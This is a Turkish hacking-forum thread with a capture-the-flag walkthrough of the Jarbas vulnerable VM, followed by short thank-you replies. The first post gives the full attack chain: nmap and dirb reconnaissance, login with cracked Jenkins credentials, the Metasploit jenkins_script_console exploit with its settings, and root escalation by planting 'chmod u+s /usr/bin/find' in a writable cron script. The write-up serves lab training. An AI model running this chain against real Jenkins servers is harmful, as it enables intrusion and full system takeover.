Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm



Jarbas Zafiyetli Makine Çözümü // Qwx

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 31-12-2018 18:34   #1
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 408


Jarbas Zafiyetli Makine Çözümü // Qwx



Jarbas Zafiyetli Makine Çözümü
Jarbas İndirme Linki ;

Kod:
https://www.vulnhub.com/entry/jarbas-1,232/

Makinemizin ilk açılış görüntüsü şu şekildedir.



Makinemizin ilk olarak IP adresini öğrenmek için netdiscover kullanıyoruz.
Kod:
netdiscover




Açık olan portlara bakmak için NMAP taramasını kullanıyoruz.

Kod:
nmap -sS -sV <adress>




IP adresimize giriş yaptığımızda bizi bu şekilde bir sayfa karşılıyor.



Portlarımızı incelediğimiz zaman 22 ve 80 nin dışında ek olarak 8080 portununda açık olduğunu görmekteyiz. Hemen burada ne olduğunu görmek adına giriş sağlıyoruz.



Bir giriş paneli bizi karşılıyor şimdi ilk adımımız bu giriş paneli bilgilerini elde etmek olacaktır. IP Adresindeki tüm içerikleri görmek için DIRB ile bir tarama gerçekleştireceğiz.

Kod:
dirb <adress> -w <wordlistkonumu> -X .txt,.html

Not : DIRB kodunda "<wordlistkonumu>" istediğiniz wordlisti kullanabilirsiniz, DIRB aracını yüklediğiniz zaman otomatik "/usr/share/wordlists/dirb/" bir şekilde buraya wordlistleriniz gelmektedir.
DIRB aramamız tamamlandı.




DIRB taramasından çıkan <adress>/access.html 'i ziyaret ettiğimizde bizde 3 tane şifrelenmiş veri vermektedir. Bu verilerin ne olduğunu çözmek adına bir siteden yardım alacağız.




Çıkan sonuçlarda hepsini teker teker denediğimizde sadece "eder" kullanıcı ismi olan ile giriş sağlayabiliyoruz, giriş yaptıktan sonra Jenkinsa Hoşgeldiniz! şeklinde bizi karşılıyor.



Sırada hangi açıklarımızın olduğunu bulmak olacak ve bunları nasıl sömürebiliriz aslında tam olayın başladığı kısım burası. M.etasploit için exploit adına bir araştırma yapmamız lazım ve "jenkins exploit" diye bir arama yapıyoruz.



Seçili sitedeki modül adını : "exploit/multi/http/jenkins_script_console" alıyoruz ve msf ' ye başlıyoruz.

Kod:
msfconsole

Kod:
 use exploit/multi/http/jenkins_script_console
 set target 1 
 set rhost <adress>
 set rport 8080
 set username eder
 set password vipsu
 set targeturi /
 run

Kod:
shell
 /bin/bash -i
find / -user root -writable -type f -not -path "/proc/*" 2>/dev/null


CleaningScript.sh adında bir script bulduk bu script'i indirip üzerinde değişiklik yapıp tekrar yükleyeceğiz.




Kod:
download CleaningScript.sh




chmod u+s /usr/bin/find komutu ile gerekli izinleri değiştirip root izinlerine sahip olacağız, değişiklikleri yaptıktan sonra tekrar upload ediyoruz.

Kod:
upload CleaningScript.sh


Upload ettikten sonra sadece biraz beklemek gerekiyor. Ardından erişim yükseltmemiz tamamlanacak. Ve bir süre geçtikten sonra artık root kullanıcısı yetkisindeyiz ve flag.txt ' yi arıyoruz.





Ve flag.txt







___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Phemis, atmaca7887 Teşekkür etti.
Alt 31-12-2018 18:53   #2
  • Web & Donanım Ekibi
  • Üye Bilgileri
Üyelik tarihi
12/2017
Nereden
-
Mesajlar
Konular

Teşekkür (Etti): 254
Teşekkür (Aldı): 334




Ellerine sağlık.



___________________________________________

İletişim: Telegram
Takipte Kalın: Twitter
 Online  
 
Alıntı ile Cevapla
Alt 31-12-2018 18:54   #3
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
06/2017
Nereden
Merdekan
Yaş
24
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 720




elve sagliq (:



___________________________________________

█║▌│█│║▌║││█║▌║▌║
© Copyright 2017
MERDEKAN
 Offline  
 
Alıntı ile Cevapla
Alt 01-01-2019 00:09   #4
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 408




Alıntı:
atmaca7887´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.


Teşekkür ederim.



Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
elve sagliq (:

Teşekkür ederim.



___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Alt 01-01-2019 00:10   #5
  • Tamamen Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
Darh Veb
Mesajlar
Konular
4

Teşekkür (Etti): 0
Teşekkür (Aldı): 98




Ellerine Sağlık Hocam.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Veloue Teşekkür etti.
Alt 04-01-2019 17:58   #6
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Elinize Sağlık (:
 Offline  
 
Alıntı ile Cevapla
Alt 04-01-2019 18:38   #7
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
01/2017
Nereden
Balkes
Yaş
18
Mesajlar
Konular

Teşekkür (Etti): 220
Teşekkür (Aldı): 476




Ellerine sağlık.



___________________________________________

SolidStar

Bin güzelliği bir hatayla siliyoruz,
Çünkü affetmeyi unuttuk; öleceğimizi unuttuğumuz gibi!
 Online  
 
Alıntı ile Cevapla
Alt 04-01-2019 18:51   #8
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
Bilinmiyor
Mesajlar
Konular

Teşekkür (Etti): 16
Teşekkür (Aldı): 55




eline sağlık



___________________________________________

Türk olmak zordur.Dünya ile savaşırsın.
Türk olmamak daha zordur.Türk ile savaşırsın.

Software Developer & Cyber Security

 Offline  
 
Alıntı ile Cevapla
Alt 04-01-2019 19:27   #9
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 408




Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık (:
Teşekkür ederim.

Alıntı:
WhiteRed´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.
Teşekkür ederim.

Alıntı:
ByQueny´isimli üyeden Alıntı Mesajı göster
eline sağlık
Teşekkür ederim.



___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Alt 04-01-2019 20:01   #10
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 158
Teşekkür (Aldı): 421




Efsane Konu Olmuş Neden Rağbet Görmemiş... Ellerine Sağlık Hack İçin Önemli Bir Şey.



___________________________________________

 Online  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau